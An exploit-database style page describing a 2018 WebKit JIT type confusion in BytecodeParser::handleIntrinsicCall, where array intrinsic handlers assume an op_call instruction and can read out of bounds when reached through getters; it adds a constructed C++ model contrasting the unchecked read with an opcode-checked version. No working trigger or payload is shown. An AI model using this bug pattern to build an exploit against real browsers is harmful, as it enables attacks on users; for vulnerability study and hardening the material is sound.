WebKit JIT BytecodeParser::handleIntrinsicCall Type Confusion Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2018-11-29 | Type : dos | Platform : multiple
This exploit / vulnerability (WebKit JIT BytecodeParser::handleIntrinsicCall type confusion) is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
/*
case ArrayPushIntrinsic: {
    ...
    if (static_cast<unsigned>(argumentCountIncludingThis) >= MIN_SPARSE_ARRAY_INDEX)
        return false;
This code always assumes that the current instruction is an op_call instruction, but it can also be reached from op_get_by_id or op_get_by_val instructions through getters. Since an op_get_by_val instruction is smaller than an op_call instruction, this can also lead to an OOB read.
Note that the handlers for ArraySliceIntrinsic, ArrayIndexOfIntrinsic and ArrayPopIntrinsic have the same pattern.
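A simplified model of the pattern described above, written for this page as an added example and not WebKit's own code: the opcodes, operand layouts and bytecode stream are constructed assumptions. It puts the unchecked read beside a version that validates the opcode before touching an op_call-specific operand, which is the check a parser needs when an intrinsic handler can be reached from a getter.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <optional>
#include <vector>
// Constructed opcodes and operand layouts (assumption: not JSC's real encoding).
// op_call:       opcode, dst, callee, argv, argumentCountIncludingThis  (5 slots)
// op_get_by_val: opcode, dst, base, property                            (4 slots)
enum Opcode : uint8_t { OpGetByVal = 1, OpCall = 2 };
constexpr size_t kOpCallLength = 5;
constexpr size_t kOpGetByValLength = 4;
constexpr size_t kArgCountOffset = 4;  // op_call slot of argumentCountIncludingThis

struct ReadResult {
    bool withinInstruction;  // false: the slot lies past the current instruction
    uint8_t value;
};

// Buggy pattern: reads the op_call argument-count slot without checking the
// opcode. From the shorter op_get_by_val the slot lies past the instruction
// (here it lands on the next opcode; at the end of a buffer it is an OOB read).
ReadResult readArgCountUnchecked(const std::vector<uint8_t>& stream, size_t pc) {
    Opcode op = static_cast<Opcode>(stream.at(pc));
    size_t len = (op == OpCall) ? kOpCallLength : kOpGetByValLength;
    size_t slot = pc + kArgCountOffset;
    return { kArgCountOffset < len, slot < stream.size() ? stream[slot] : uint8_t{0} };
}

// Hardened pattern: only op_call carries an argument count, so the opcode is
// validated before any op_call-specific operand is read.
std::optional<uint8_t> readArgCountChecked(const std::vector<uint8_t>& stream, size_t pc) {
    if (static_cast<Opcode>(stream.at(pc)) != OpCall)
        return std::nullopt;
    return stream.at(pc + kArgCountOffset);
}

// Constructed stream: op_get_by_val at pc 0, then op_call at pc 4 with argc = 2.
std::vector<uint8_t> sampleStream() {
    return { OpGetByVal, 0, 1, 2,     // dst=0 base=1 property=2
             OpCall, 3, 4, 5, 2 };    // dst=3 callee=4 argv=5 argc=2
}

int main() {
    std::vector<uint8_t> s = sampleStream();
    std::printf("pc=0 inside=%d checked=%d\n", readArgCountUnchecked(s, 0).withinInstruction,
                readArgCountChecked(s, 0).has_value());
    std::printf("pc=4 argc=%d\n", (int)readArgCountChecked(s, 4).value());
    return 0;
}
```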